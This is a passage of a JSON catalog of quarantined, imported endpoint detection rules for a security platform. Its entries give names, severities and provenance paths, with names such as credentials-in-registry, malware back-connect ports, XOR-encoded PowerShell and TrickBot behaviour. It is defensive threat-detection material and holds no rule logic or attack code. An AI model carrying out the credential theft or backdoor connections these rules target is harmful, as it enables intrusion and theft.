"suspicious_program_location_process_starts", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_program_location_process_starts.yaral" } }, { "id": "chronicle-detection-rules-suspicious-program-location-with-network-connections", "type": "detection", "name": "suspicious_program_location_with_network_connections", "description": "suspicious_program_location_with_network_connections", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-program-location-with-network-connections.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_program_location_with_network_connections", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/suspicious_program_location_with_network_connections.yaral" } }, { "id": "chronicle-detection-rules-suspicious-psexec-execution", "type": "detection", "name": "suspicious_psexec_execution", "description": "suspicious_psexec_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/suspicious-psexec-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_psexec_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/suspicious_psexec_execution.yaral" } }, { "id": "chronicle-detection-rules-suspicious-rasdial-activity", "type": "detection", "name": "suspicious_rasdial_activity", "description": "suspicious_rasdial_activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-rasdial-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_rasdial_activity", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_rasdial_activity.yaral" } }, { "id": "chronicle-detection-rules-suspicious-rdp-redirect-using-tscon", "type": "detection", "name": "suspicious_rdp_redirect_using_tscon", "description": "suspicious_rdp_redirect_using_tscon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, 
"source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-rdp-redirect-using-tscon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_rdp_redirect_using_tscon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_rdp_redirect_using_tscon.yaral" } }, { "id": "chronicle-detection-rules-suspicious-reconnaissance-activity", "type": "detection", "name": "suspicious_reconnaissance_activity", "description": "suspicious_reconnaissance_activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-reconnaissance-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_reconnaissance_activity", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_reconnaissance_activity.yaral" } }, { "id": "chronicle-detection-rules-suspicious-reconnaissance-activity-sysmon", "type": "detection", "name": "suspicious_reconnaissance_activity_sysmon", "description": "suspicious_reconnaissance_activity_sysmon", "version": "1.0.0", 
"author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-reconnaissance-activity-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_reconnaissance_activity_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/suspicious_reconnaissance_activity__sysmon.yaral" } }, { "id": "chronicle-detection-rules-suspicious-run-key-from-download", "type": "detection", "name": "suspicious_run_key_from_download", "description": "suspicious_run_key_from_download", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-run-key-from-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_run_key_from_download", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/suspicious_run_key_from_download.yaral" } }, { "id": "chronicle-detection-rules-suspicious-rundll32-activity", "type": 
"detection", "name": "suspicious_rundll32_activity", "description": "suspicious_rundll32_activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-rundll32-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_rundll32_activity", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_rundll32_activity.yaral" } }, { "id": "chronicle-detection-rules-suspicious-scheduled-task", "type": "detection", "name": "suspicious_scheduled_task", "description": "suspicious_scheduled_task", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-scheduled-task.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_scheduled_task", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/suspicious_scheduled_task.yaral" } }, { "id": 
"chronicle-detection-rules-suspicious-schtasks-creation-possible-windows-0day-lpe-aka-polarbear-by-sandboxe", "type": "detection", "name": "suspicious_schtasks_creation_possible_windows_0day_lpe_aka_polarbear_by_sandboxescaper", "description": "suspicious_schtasks_creation_possible_windows_0day_lpe_aka_polarbear_by_sandboxescaper", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-schtasks-creation-possible-windows-0day-lpe-aka-polarbear-by-sandboxe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_schtasks_creation_possible_windows_0day_lpe_aka_polarbear_by_sandboxescaper", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/microsoft_sysmon/suspicious_schtasks_creation__possible_windows_0day_lpe_aka__polarbear__by_sandboxescaper.yaral" } }, { "id": "chronicle-detection-rules-suspicious-svchost-process-sysmon", "type": "detection", "name": "suspicious_svchost_process_sysmon", "description": "suspicious_svchost_process_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-svchost-process-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not 
directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_svchost_process_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/suspicious_svchost_process__sysmon.yaral" } }, { "id": "chronicle-detection-rules-suspicious-sysvol-domain-group-policy-access", "type": "detection", "name": "suspicious_sysvol_domain_group_policy_access", "description": "suspicious_sysvol_domain_group_policy_access", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-sysvol-domain-group-policy-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_sysvol_domain_group_policy_access", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_sysvol_domain_group_policy_access.yaral" } }, { "id": "chronicle-detection-rules-suspicious-traffic-port-666", "type": "detection", "name": "suspicious_traffic_port_666", "description": "suspicious_traffic_port_666", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": 
"imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-traffic-port-666.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_traffic_port_666", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/traffic_port_666.yaral" } }, { "id": "chronicle-detection-rules-suspicious-typical-malware-back-connect-ports", "type": "detection", "name": "suspicious_typical_malware_back_connect_ports", "description": "suspicious_typical_malware_back_connect_ports", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-typical-malware-back-connect-ports.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_typical_malware_back_connect_ports", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/suspicious_typical_malware_back_connect_ports.yaral" } }, { "id": "chronicle-detection-rules-suspicious-unusual-location-lnk-file", "type": "detection", "name": "suspicious_unusual_location_lnk_file", "description": "suspicious_unusual_location_lnk_file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", 
"category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-unusual-location-lnk-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_unusual_location_lnk_file", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/unusual_location_lnk_file.yaral" } }, { "id": "chronicle-detection-rules-suspicious-unusual-location-svchost-execution", "type": "detection", "name": "suspicious_unusual_location_svchost_execution", "description": "suspicious_unusual_location_svchost_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-unusual-location-svchost-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_unusual_location_svchost_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/unusual_location_svchost_execution.yaral" } }, { "id": "chronicle-detection-rules-suspicious-unusual-location-svchost-write", "type": "detection", "name": "suspicious_unusual_location_svchost_write", 
"description": "suspicious_unusual_location_svchost_write", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-unusual-location-svchost-write.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_unusual_location_svchost_write", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/unusual_location_svchost_write.yaral" } }, { "id": "chronicle-detection-rules-suspicious-user-agent", "type": "detection", "name": "suspicious_user_agent", "description": "suspicious_user_agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_user_agent", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/suspicious_user_agent.yaral" } }, { "id": "chronicle-detection-rules-suspicious-wmi-execution", "type": "detection", "name": 
"suspicious_wmi_execution", "description": "suspicious_wmi_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-wmi-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_wmi_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_wmi_execution.yaral" } }, { "id": "chronicle-detection-rules-suspicious-xor-encoded-powershell-command-line", "type": "detection", "name": "suspicious_xor_encoded_powershell_command_line", "description": "suspicious_xor_encoded_powershell_command_line", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-xor-encoded-powershell-command-line.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_xor_encoded_powershell_command_line", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_xor_encoded_powershell_command_line.yaral" } }, { "id": "chronicle-detection-rules-swisyn-malware-detector-sysmon-behavior-august-2019", "type": "detection", "name": "swisyn_malware_detector_sysmon_behavior_august_2019", "description": "swisyn_malware_detector_sysmon_behavior_august_2019", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/swisyn-malware-detector-sysmon-behavior-august-2019.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "swisyn_malware_detector_sysmon_behavior_august_2019", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/swisyn_malware_detector__sysmon_behavior___august_2019.yaral" } }, { "id": "chronicle-detection-rules-sysmon-service-enumeration", "type": "detection", "name": "sysmon_service_enumeration", "description": "sysmon_service_enumeration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sysmon-service-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", 
"source_id": "sysmon_service_enumeration", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/powershell/sysmon_service_enumeration.yaral" } }, { "id": "chronicle-detection-rules-sysmon-state-and-configuration-changed", "type": "detection", "name": "sysmon_state_and_configuration_changed", "description": "sysmon_state_and_configuration_changed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sysmon-state-and-configuration-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sysmon_state_and_configuration_changed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/sysmon_state_and_configuration_changed.yaral" } }, { "id": "chronicle-detection-rules-system-file-execution-location-anomaly", "type": "detection", "name": "system_file_execution_location_anomaly", "description": "system_file_execution_location_anomaly", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/system-file-execution-location-anomaly.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "system_file_execution_location_anomaly", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/system_file_execution_location_anomaly.yaral" } }, { "id": "chronicle-detection-rules-system-information-gathering-via-wmicexe", "type": "detection", "name": "system_information_gathering_via_wmicexe", "description": "system_information_gathering_via_wmicexe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/system-information-gathering-via-wmicexe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "system_information_gathering_via_wmicexe", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/process_creation/system_information_gathering_via_wmic_exe.yaral" } }, { "id": "chronicle-detection-rules-t1053-005-windows-creation-of-scheduled-task", "type": "detection", "name": "T1053_005_windows_creation_of_scheduled_task", "description": "T1053_005_windows_creation_of_scheduled_task", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], 
"log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/t1053-005-windows-creation-of-scheduled-task.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "T1053_005_windows_creation_of_scheduled_task", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/mitre_attack/T1053_005_windows_creation_of_scheduled_task.yaral" } }, { "id": "chronicle-detection-rules-t1214-credentials-in-registry", "type": "detection", "name": "t1214__credentials_in_registry", "description": "t1214__credentials_in_registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/t1214-credentials-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "t1214__credentials_in_registry", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/process_creation/t1214___credentials_in_registry.yaral" } }, { "id": "chronicle-detection-rules-ta505-group-targets-the-us-retail-industry-sysmon", "type": "detection", "name": "ta505_group_targets_the_us_retail_industry_sysmon", "description": 
"ta505_group_targets_the_us_retail_industry_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ta505-group-targets-the-us-retail-industry-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ta505_group_targets_the_us_retail_industry_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/ta505_group_targets_the_us_retail_industry__sysmon.yaral" } }, { "id": "chronicle-detection-rules-terminal-service-process-spawn", "type": "detection", "name": "terminal_service_process_spawn", "description": "terminal_service_process_spawn", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/terminal-service-process-spawn.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "terminal_service_process_spawn", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/_deprecated/soc_prime_rules/proactive_exploit_detection/process_creation/terminal_service_process_spawn.yaral" } }, { "id": "chronicle-detection-rules-the-gocgle-malicious-campaign", "type": "detection", "name": "the_gocgle_malicious_campaign", "description": "the_gocgle_malicious_campaign", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/the-gocgle-malicious-campaign.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "the_gocgle_malicious_campaign", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/cloud_security/proxy/the_gocgle_malicious_campaign.yaral" } }, { "id": "chronicle-detection-rules-trickbot-behaviour-privilege-escalation-attack", "type": "detection", "name": "trickbot_behaviour_privilege_escalation_attack", "description": "trickbot_behaviour_privilege_escalation_attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/trickbot-behaviour-privilege-escalation-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "trickbot_behaviour_privilege_escalation_attack", 
"source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/sysmon/trickbot_behaviour__privilege_escalation_attack.yaral" } }, { "id": "chronicle-detection-rules-trickbot-malware-detector-sysmon-behavior-july-2019", "type": "detection", "name": "trickbot_malware_detector_sysmon_behavior_july_2019", "description": "trickbot_malware_detector_sysmon_behavior_july_2019", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/trickbot-malware-detector-sysmon-behavior-july-2019.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "trickbot_malware_detector_sysmon_behavior_july_2019", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/trickbot_malware_detector__sysmon_behavior___july_2019.yaral" } }, { "id": "chronicle-detection-rules-troldesh-ransomware-detector-sysmon", "type": "detection", "name": "troldesh_ransomware_detector_sysmon", "description": "troldesh_ransomware_detector_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
